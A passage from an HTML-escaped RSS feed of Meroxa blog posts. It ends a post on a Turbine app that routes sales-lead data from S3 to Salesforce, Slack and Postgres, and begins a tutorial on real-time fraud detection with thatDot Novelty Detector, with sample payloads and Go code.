            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;data&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;makeRequest&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;end&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;done&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;makeRequest&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; companyUrl &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;_10&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; company &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;cleanURL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;companyUrl&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; plResults &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;makePLRequest&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;companyUrl&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; contactInfo &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;findIcpAtCompany&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;companyUrl&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; sfdcResponse &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;sendToSalesforce&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;contactInfo&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; slackResponse &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;sendSlackNotification&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;contactInfo&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; csvFiles &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3BucketName&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; prospected &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;csvFiles&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;digForGold&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; analytics &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;prospected&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;salesLeads&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;This was one of the more complex use cases, but it helped exercise and showcase the power of &lt;a href=&quot;https://docs.meroxa.com/turbine/get-started&quot;&gt;Turbine&lt;/a&gt;. There’s so much power in leveraging plain code interspersed with the advantages Turbine provides. For obvious reasons, we aren’t open sourcing this app 😊 but if you have questions, please contact us via our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord channel&lt;/a&gt; or at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you’d like to see more data app examples, please feel free to make your request in our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord channel&lt;/a&gt;. Otherwise, get started by &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme&quot;&gt;requesting a free demo of Meroxa&lt;/a&gt; and build something cool. Your app could also be featured in our “Data App Spotlight” series.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Fraud Detection with Turbine and Novelty Detector]]></title><description><![CDATA[What if you could easily access and use categorical data to detect dangerous anomalies? With Turbine and thatDot Novelty Detector, you can.]]></description><link>https://meroxa.com/blog/real-time-fraud-detection-with-turbine-and-novelty-detector</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-fraud-detection-with-turbine-and-novelty-detector</guid><dc:creator><![CDATA[Co-authored by Meroxa and thatDot]]></dc:creator><pubDate>Wed, 17 Aug 2022 17:16:01 GMT</pubDate><content:encoded>&lt;p&gt;Most fraud detection is based on numeric data. Why? Because it&apos;s easier. Categorical data is hard to analyze and virtually impossible to analyze in real time. Behavioral and profile data can provide the necessary info to detect an anomaly. And we’re not talking about just scoring the categorical data in order to make the models easier. With Meroxa Turbine and thatDot Novelty Detector, accessing and analyzing categorical data just got a lot easier.&lt;/p&gt;
&lt;p&gt;Turbine is Meroxa’s real-time data application framework that makes it easy to turn your data pipelines into data applications. The vision for the Meroxa Data Platform and Turbine is to empower software engineers to build and deploy Data Apps: data-processing applications that manipulate, enrich, and analyze data to solve problems and derive value for the business.&lt;/p&gt;
&lt;p&gt;An appealing aspect of the Turbine framework is that it enables the use of highly specialized tools such as thatDot’s Novelty Detector product. Novelty Detector is a real-time anomaly detection tool that uses categorical data to surface anomalies you might otherwise miss, while greatly reducing false positives.&lt;/p&gt;
&lt;p&gt;Together, these two tools can help you build a data infrastructure powerful enough to handle large volumes of data and quickly identify anomalies. This can be a valuable addition to any software stack, as it can help you and your customers avoid costly mistakes and quickly identify and fix problems.&lt;/p&gt;
&lt;p&gt;In this blog, we’ll outline a simple Turbine Data App that leverages Novelty Detector to highlight novel, noteworthy, or otherwise interesting user activities in real time.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/novelty-app.png&quot; alt=&quot;novelty-app&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Prerequisite:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Sign up for a Meroxa account and install the latest Meroxa CLI.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Set up your Novelty Environment and obtain credentials.&lt;/li&gt;
&lt;li&gt;Clone the example to your local machine:&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;git clone git@github.com:meroxa/novelty.git&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Since this example uses Go, you will need to have Go installed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The novelty Turbine app takes user activity data (e.g., user A carried out action B at time T) from a PostgreSQL database and streams it in real time to the Novelty Detector server. The Novelty Detector server scores each &quot;observation&quot; for novelty, adding some additional anomaly metadata, which is then injected back into the PostgreSQL database.&lt;/p&gt;
&lt;p&gt;Here’s an example Novelty Detector response payload:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;observation&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
		&lt;span class=&quot;token string&quot;&gt;&quot;my&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;sample&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;observation&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;score&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.36231689108923804&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;totalObsScore&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.36231689108923804&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;sequence&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;probability&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.6666666666666666&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;uniqueness&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.9943363088569088&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;infoContent&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.5849625007211563&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;mostNovelComponent&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token string-property property&quot;&gt;&quot;index&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		&lt;span class=&quot;token string-property property&quot;&gt;&quot;value&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;observation&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		&lt;span class=&quot;token string-property property&quot;&gt;&quot;novelty&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.5849625007211563&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A full explanation of each field of the payload can be found in the Novelty Detector Usage Guide &lt;a href=&quot;https://www.thatdot.com/product/novelty-detector-docs/usage-guide&quot;&gt;here&lt;/a&gt;, but a few of the more interesting payload elements are worth noting:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;observation - the observation originally passed into Novelty Detector, included for reference.&lt;/li&gt;
&lt;li&gt;score - the total calculation of how novel the particular observation is. The value is always between 0 and 1, where 0 is entirely normal and not anomalous, and 1 is highly novel and clearly anomalous.&lt;/li&gt;
&lt;li&gt;mostNovelComponent - an object consisting of index, value, and novelty, indicating how novel the most novel component of the observation (identified by index and value) is.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A key aspect of Novelty Detector, and one of the reasons it pairs so well with Turbine, is its simplicity of operation: once you have connected Turbine to Novelty Detector, it starts scoring observations without requiring any other configuration or setup.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Code:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The core of the Data App looks much like any typical Turbine app, but there are a couple of sections worth digging into.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;formatObservation&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	country &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;country&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	city &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;city&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	email &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	userID &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;user_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	tsFloat &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;timestamp&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	tod&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;timeOfDay&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Sprint&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;tsFloat&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error in formatObservation: %s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;tod: %+v&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; tod&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	obs &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;tod&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; country&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; city&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; email&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Sprint&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;userID&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;obs: %+v&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; obs&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; obs
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here we’re formatting the observation as an array of categorical data, ordered starting with the lowest-cardinality (most significant) value.&lt;/p&gt;
&lt;p&gt;A particularly interesting optimization is the &lt;em&gt;bucketing&lt;/em&gt; of time data in the form of the &lt;code class=&quot;language-text&quot;&gt;timeOfDay&lt;/code&gt; function.&lt;/p&gt;
